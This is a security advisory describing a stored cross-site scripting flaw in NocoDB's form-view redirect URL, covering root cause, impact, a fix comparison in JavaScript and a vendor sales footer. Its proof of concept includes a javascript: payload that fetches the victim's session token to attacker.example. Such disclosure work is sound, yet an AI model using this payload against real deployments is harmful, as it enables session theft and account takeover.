NocoDB: Stored XSS via a form view redirect URL
A user with the editor role can store a javascript: payload in a form view's redirect URL that executes in the victim's browser when the public form is submitted, steals their session token and leads to account takeover.
Advisory ID: TP-2026-007
Product: NocoDB (open-source platform that turns databases into spreadsheets, forms and dashboards)
Vulnerability type: Stored cross-site scripting (CWE-79)
CVE: CVE-2026-47387
CVSS 3.1: 8.7 (High) · CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Affected versions: <= 2026.05.0
Fixed in: 2026.05.1
Vendor advisory: GHSA-hj85-ph9q-78jg
Reported: 14 May 2026
Summary
NocoDB is a widely used open-source platform that turns relational databases into spreadsheets, forms and dashboards. A form view can store a redirect URL that the form navigates to after submission; its validation does not effectively check the URL scheme, and the additional same-host check is bypassed by javascript: URLs because their host component is empty. A user with the editor role on any base stores a javascript: payload as the redirect_url; the public share link returns this value unchanged, and as soon as a higher-privileged user submits the form the script runs in NocoDB's origin. It reads the session token from local storage and uses it to make authenticated API calls on behalf of the victim, leading to account takeover. turingpoint verified the end-to-end flow as a stored XSS leading to account takeover and reported it responsibly to the vendor.
Root cause
NocoDB lets a form's post-submit redirect target be stored as redirect_url; the shared-form store validates this value with isValidRedirectUrl, which only checks for a non-empty string and performs no scheme check (packages/nc-gui/composables/useSharedFormViewStore.ts). The submit handler additionally compares the parsed anchor.host of the URL with window.location.host to keep the redirect on the same origin (packages/nc-gui/composables/useSharedFormViewStore.ts). For non-network schemes such as javascript:, data: or file:, the browser sets anchor.host to the empty string, so this same-host comparison never blocks the value and the raw URL is used as the navigation target. The public meta endpoint of the form share returns the stored redirect_url verbatim to every viewer, so an attacker-controlled javascript: URL reaches the victim's browser unfiltered. Any user with the editor role on any base can set redirect_url, and once a viewer submits the form the handler navigates to the javascript: URL, which executes in NocoDB's origin and reads the session token from localStorage['nocodb-gui-v2'].
Proof of Concept
An editor sets the form view's redirect URL to a javascript: payload, and the public share link returns it unchanged:
// Editor sets the form view's redirect URL:
redirect_url = javascript:fetch('https://attacker.example/c?t='+JSON.parse(localStorage['nocodb-gui-v2']).token)
// Public share link of the form:
GET /dashboard/#/nc/form/<shared-view-uuid>
// The meta endpoint returns redirect_url verbatim; on submit the handler navigates to it.
isValidRedirectUrl lets the javascript: scheme through, and the same-host check does not apply because a javascript: URL has no host (anchor.host is empty). On submission of the public form the payload executes in NocoDB's origin, reads the session token from local storage and exfiltrates it to the attacker.
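To make the bypass described under Root cause and in the proof of concept concrete, the following is an added example (not NocoDB's code and not part of the original advisory) that reconstructs the weak check as the advisory describes it and places a hardened validator beside it. The host-comparison logic of the weak check is an assumption: an empty host is treated as a same-site relative URL, which is why a javascript: value is never blocked. The hardened version parses with the WHATWG URL API and allows only http(s) URLs on the application's own origin; ORIGIN and the sample values are constructed.

```javascript
// Constructed origin of the NocoDB instance (assumption, not a real deployment).
const ORIGIN = 'https://nocodb.example';

// Reconstruction of the weak check the advisory describes (assumed shape, not NocoDB's code):
//   1. isValidRedirectUrl: accept any non-empty string, no scheme check.
//   2. Same-host check: compare the parsed host with the current host.
// For non-network schemes (javascript:, data:, file:) the parser yields an empty host,
// so the comparison never blocks them.
function weakAllowsRedirect(value, currentHost) {
  if (typeof value !== 'string' || value.length === 0) return false;
  let host;
  try {
    host = new URL(value, 'https://' + currentHost).host;
  } catch (e) {
    return false;
  }
  // Assumed: an empty host is treated as a relative (same-site) target.
  return host === '' || host === currentHost;
}

// Hardened validator: parse, then allow only http(s) targets on the application's own origin.
// Relative paths resolve against currentOrigin, so "/dashboard/#/thanks" is still allowed,
// while javascript:, data:, protocol-relative "//evil.example" and foreign origins are rejected.
// The URL parser lowercases the scheme and strips leading whitespace, tabs and newlines,
// so obfuscated spellings of "javascript:" are caught as well.
function isSafeRedirectUrl(value, currentOrigin) {
  if (typeof value !== 'string' || value.trim() === '') return false;
  let url;
  try {
    url = new URL(value, currentOrigin);
  } catch (e) {
    return false;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return false;
  return url.origin === new URL(currentOrigin).origin;
}

// Constructed samples: the first is the kind of value the advisory describes.
const samples = ['javascript:alert(1)', ' JavaScript:alert(1)', 'data:text/html,x',
                 '//evil.example/x', 'https://evil.example/', '/dashboard/#/thanks'];
for (const s of samples) {
  console.log(JSON.stringify(s),
    'weak:', weakAllowsRedirect(s, new URL(ORIGIN).host),
    'hardened:', isSafeRedirectUrl(s, ORIGIN));
}
```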
Impact
- A user with the editor role on any base stores a javascript: redirect that executes in the session of any user who submits the public form.
- The session token stolen from local storage allows authenticated API calls on behalf of the victim within their permissions.
- If a higher-privileged user (workspace owner or admin) submits the form, the attacker escalates to that account, which amounts to full account takeover.
- The payload runs in NocoDB's own origin and needs no interaction beyond the normal single-click form submission.
References
Is Something Like This in Your Software?
Our team found this vulnerability in the course of its work. Have your applications tested by the same specialists, with a penetration test from turingpoint.
